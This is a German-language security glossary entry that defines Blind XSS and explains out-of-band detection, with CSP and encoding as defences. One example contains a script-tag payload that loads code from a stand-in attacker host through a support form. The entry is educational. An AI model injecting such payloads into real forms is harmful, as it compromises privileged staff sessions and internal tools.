Blind XSS
Was ist Blind XSS?
Blind XSSVariante des Stored XSS, bei der die Payload in einem für den Angreifer unsichtbaren Kontext zündet, typischerweise einem internen Admin-Werkzeug.
Blind XSS ist eine Unterklasse des Stored XSS, bei der das Skript nicht im Browser des Angreifers ausgeführt wird, sondern in einem anderen, meist privilegierten Kontext: Support-Ticket-Ansicht, Betrugsprüfungs-Konsole, internes Dashboard oder Backup-Report. Der Angreifer sendet die Payload über ein öffentliches Formular (Kontakt, Registrierung, Supportanfrage) und wartet, bis ein interner Nutzer die Daten anzeigt. Die Erkennung erfolgt über Out-of-Band-Callbacks: Die Payload sendet Informationen an XSS Hunter, Burp Collaborator oder einen eigenen DNS/HTTP-Server. Schutz erfolgt wie bei Stored XSS, ergänzt durch eine strikte CSP auf Admin-Tools.
● Beispiele
- 01
Ein Support-Formularfeld mit <script src=https://x.attacker/x.js></script>, das im Agenten-CRM zündet.
- 02
Ein User-Agent-Header, der in einem Admin-Log-Viewer ohne HTML-Encoding angezeigt wird.
● Häufige Fragen
Was ist Blind XSS?
Variante des Stored XSS, bei der die Payload in einem für den Angreifer unsichtbaren Kontext zündet, typischerweise einem internen Admin-Werkzeug. Es gehört zur Kategorie Angriffe und Bedrohungen der Cybersicherheit.
Was bedeutet Blind XSS?
Variante des Stored XSS, bei der die Payload in einem für den Angreifer unsichtbaren Kontext zündet, typischerweise einem internen Admin-Werkzeug.
Wie funktioniert Blind XSS?
Blind XSS ist eine Unterklasse des Stored XSS, bei der das Skript nicht im Browser des Angreifers ausgeführt wird, sondern in einem anderen, meist privilegierten Kontext: Support-Ticket-Ansicht, Betrugsprüfungs-Konsole, internes Dashboard oder Backup-Report. Der Angreifer sendet die Payload über ein öffentliches Formular (Kontakt, Registrierung, Supportanfrage) und wartet, bis ein interner Nutzer die Daten anzeigt. Die Erkennung erfolgt über Out-of-Band-Callbacks: Die Payload sendet Informationen an XSS Hunter, Burp Collaborator oder einen eigenen DNS/HTTP-Server. Schutz erfolgt wie bei Stored XSS, ergänzt durch eine strikte CSP auf Admin-Tools.
Wie schützt man sich gegen Blind XSS?
Schutzmaßnahmen gegen Blind XSS kombinieren typischerweise technische Kontrollen und operative Praktiken, wie in der Definition oben beschrieben.
Welche anderen Bezeichnungen gibt es für Blind XSS?
Übliche alternative Bezeichnungen: Out-of-Band-XSS.
● Verwandte Begriffe
- attacks№ 240
Cross-Site-Scripting (XSS)
Web-Schwachstelle, mit der Angreifer bösartige Skripte in Seiten injizieren, die andere Nutzer öffnen, sodass der Code im Browser des Opfers unter der Origin der Seite ausgeführt wird.
- attacks№ 1107
Stored XSS
Persistente Cross-Site-Scripting-Schwachstelle: vom Angreifer eingeschleuster Code wird serverseitig gespeichert und im Browser jedes Besuchers ausgeführt.
- attacks№ 912
Reflected XSS
Nicht-persistente XSS-Variante, bei der angreifergesteuerte Eingaben unmittelbar in der Antwort gespiegelt und im Browser des Opfers ausgeführt werden.
- attacks№ 347
DOM-basierter XSS
XSS-Variante, bei der Injektion und Ausführung vollständig im Browser stattfinden, weil clientseitiges JavaScript ungeprüfte Daten in einen Sink schreibt.
- appsec№ 214
Content Security Policy (CSP)
HTTP-Antwort-Header, der dem Browser mitteilt, welche Quellen für Skripte, Styles, Frames und andere Inhalte erlaubt sind, und so XSS- und Datendiebstahlangriffe begrenzt.
- appsec№ 773
Ausgabeencodierung
Umwandlung unvertrauenswürdiger Daten in eine für einen bestimmten Ausgabekontext (HTML, JavaScript, URL, SQL, Shell) sichere Form, sodass sie nicht ausbrechen und als Code ausgeführt werden.